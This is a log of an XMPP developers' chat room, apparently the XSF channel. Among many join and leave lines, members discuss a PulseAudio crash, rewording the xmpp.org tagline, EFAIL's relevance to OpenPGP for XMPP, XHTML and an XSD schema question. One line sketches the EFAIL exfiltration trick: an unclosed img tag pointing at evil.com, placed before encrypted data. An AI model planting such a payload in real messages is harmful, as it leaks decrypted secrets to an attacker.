how do a lot of offline messages crash pulseaudio.
Nekithas left
MattJ
jonasw, notification sound. I think it probably tried to play thousands of them at once
jonasw
and opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.
jonasw
but still a bug in pulse probably :)
MattJ
Yeah
rionhas joined
forensic58has left
forensic58has joined
marmistrzhas left
tahas joined
seandreashas joined
seandreashas joined
lskdjfhas left
winfriedhas left
marmistrzhas left
la|r|mahas left
la|r|mahas joined
la|r|mahas left
la|r|mahas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
lskdjfhas joined
Valerianhas left
Nekithas joined
seandreashas joined
flow
> jonasw> but still a bug in pulse probably :)
flow
not sure if lennart would agree
jonasw
AFAIK lennart isn’t involved with pulse anymore
Zash
I'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.
jonasw
I feel you
forensic58has left
forensic58has joined
alexishas left
alexishas joined
Neustradamushas left
alexishas left
alexishas joined
moparisthebesthas joined
jerehas joined
moparisthebesthas joined
xnyhpshas left
Andrew Nenakhovhas left
Andrew Nenakhovhas joined
lumihas left
lumihas joined
xnyhpshas joined
Guushas left
andyhas left
andyhas joined
jubalhhas joined
Andrew Nenakhovhas left
Andrew Nenakhovhas joined
jerehas left
jerehas joined
Nekithas joined
ThibGhas joined
lorddavidiiihas left
alexishas left
alexishas joined
jubalhhas left
ThibGhas joined
forensic58has left
forensic58has joined
ralphmhas joined
ThibGhas left
ThibGhas joined
rtq3has left
rtq3has joined
vanitasvitaehas left
Wiktorhas left
mimi89999has joined
goffihas left
vanitasvitaehas left
jubalhhas joined
jubalhhas left
Guushas left
debaclehas joined
Guushas left
Valerianhas joined
debacle
Recently I complained about xmpp.org advertising XMPP as "most secure" messaging standard. Some people agreed, that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt, that XMPP is exceptionally secure :~)
debacle
I suggest to replace "most secure" with the word "universal".
Zash
Secure in its awesomeness
Seve/SouL
Yes
Seve/SouL
that's the idea for me
debacle
I believe, that the most important aspect of XMPP compared to other, similar technologies is it's "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.
Seve/SouL
Something that would mean in a way 'the standard'
Seve/SouL
I like that
moparisthebesthas left
daniel
The literal battle tested might also not fly well with some people...
Zash
The Standard.
Seve/SouL
Yes.
Zash
It's probably fine for it to be bold
debacle
"Battle-tested" might also be something to change, true.
Zash
What was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.
Zash
debacle: That might actually be true in a literal sense.
daniel
Zash: that's the problem
debacle
Yes, but do you want to use this use case for the ads? :~)
debacle
Pacifists or anti-bellicists might go to Matrix then :~)
daniel
I mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience
jubalhhas joined
debacle
XEPs are lethal in some way...
jjrhhas left
Zash
XEPs don't kill people. People kill people.
ThibGhas joined
jjrhhas left
Valerianhas left
andyhas joined
Valerianhas joined
daniel
That would make for a better slogan
j.rhas joined
Kev
I raised the tagline at the time. It was a deliberate decision by (then) Board.
debacle
Back to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)
Not everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing
Zash
All publicity is good publicity, as they say
debacle
The EFFail was no good marketing, neither for PGP nor EFF.
Zash
When everyone has forgotten the details, they might remember "PGP". If so, then it was a success.
alacerhas left
vanitasvitae
I should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.
Kev
If people read the details, they'd see it had nothing to do with pgp in the first place :)
debacle
The remember "PGP is dangerous, I must uninstall it and replace with Signal"✎
debacle
They remember "PGP is dangerous, I must uninstall it and replace with Signal" ✏
Zash
vanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible
vanitasvitae
Zash, no, it was also about PGP
vanitasvitae
PGP was just harder to attack
moparisthebest
not really, it was an HTML thing, you know, like xhmtl-im
daniel
If you put xhtml in your ox one could maybe do something similar
daniel
Under some conditions
jjrhhas left
daniel
If you implemted both xhtml and your ox in a bad way that is
vanitasvitae
daniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.
vanitasvitae
But I have to evaluate that in more depth
Zash
If you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here
daniel
Yeah I think you could deliberately Design and implemted ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza
seandreashas joined
MattJ
debacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there
debacle
MattJ, will do, thanks!
j.rhas joined
vanitasvitae
by the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D
Zash
As long as messages are either encrypted or not, it should be fine
jjrhhas left
Guushas left
jjrhhas left
Guushas left
Guushas left
jubalhhas left
Guushas left
Guushas left
Guushas left
ThibGhas left
Guushas joined
ThibGhas joined
Guushas left
Guushas left
Guushas joined
mrdoctorwhohas left
andyhas left
seandreashas left
j.rhas left
j.rhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
j.rhas joined
j.rhas joined
j.rhas left
j.rhas joined
jubalhhas joined
j.rhas joined
j.rhas joined
waqashas joined
j.rhas joined
Wiktor
who would've though using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/
Zash
Nah, who cares, kill XHTML
Zash
XHTML is dead, long live tag soup!
Wiktor
yep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death
Zash
Nah, XHTML 2 was bad because it fixed stupid early mistakes in HTML
Zash
Like a single <h> instead of <h[1-6]>
Wiktor
single <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/
forensic58has left
Link Mauve
Wiktor, s/green/yellow/ :p
forensic58has joined
j.rhas joined
Wiktor
Link Mauve: yes, lol, I've imagined yellow but said green, weird
lovetoxhas left
moparisthebest
I miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer
moparisthebest
because the img width/height were too large of integers...
Wiktor
deathpic.png, sounds dangerous
jubalhhas left
Link Mauve
This is scary at so many levels.
Link Mauve
Why would parsing an HTML integer trigger a kernel panic.
moparisthebest
yea everyone thought it was the image, it wasn't, it's an overflow with the tags :)
moparisthebest
Link Mauve, right? :)
moparisthebest
I want to say it was vulnerable to windows xp sp1, then sp2 fixed it
Ge0rG
"vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?
forensic58has left
forensic58has joined
Valerianhas left
Valerianhas joined
ralphmhas left
Valerianhas left
Valerianhas joined
jubalhhas joined
jubalhhas left
rionhas left
Steve Killehas left
Steve Killehas left
Steve Killehas left
Steve Killehas left
Steve Killehas joined
lorddavidiiihas left
rtq3has left
ibikkhas joined
jubalhhas joined
lorddavidiiihas joined
lskdjfhas left
ralphmhas joined
lorddavidiiihas left
Valerianhas left
Valerianhas joined
rtq3has joined
jubalhhas left
marmistrzhas left
Steve Killehas left
la|r|mahas joined
lorddavidiiihas joined
Valerianhas left
Valerianhas joined
j.rhas joined
j.rhas joined
tahas left
mhterreshas joined
mhterreshas left
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
Valerianhas joined
Valerianhas left
lskdjfhas joined
xnyhpshas joined
Wiktorhas joined
Nekithas joined
ibikkhas left
flowhas left
ibikkhas left
lorddavidiiihas left
Guushas left
jjrhhas left
flowhas left
jjrhhas left
seandreashas joined
lorddavidiiihas joined
rtq3has left
rtq3has joined
Guushas left
Guushas left
jjrhhas left
Guushas left
ibikkhas joined
peterhas joined
andyhas joined
Timhas joined
Chobbeshas joined
moparisthebest
are there any XSD wizards in here that could tell me if according to this schema if I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property
moparisthebest
like <Link bla><Property type="something">data1</Property><Property type="something">data2</Property></Link> ?
alexishas left
alexishas joined
marchas joined
moparisthebest
http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>
moparisthebest
so I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)
rionhas joined
seandreashas joined
Valerianhas joined
la|r|mahas left
la|r|mahas joined
jubalhhas joined
jubalhhas left
ralphmhas left
lnjhas left
lorddavidiiihas left
jonasw
moparisthebest, I’m rather sure that XSD can’t express such things
lovetoxhas joined
moparisthebest
thanks jonasw , as an aside you've been doing an exceptional job as editor lately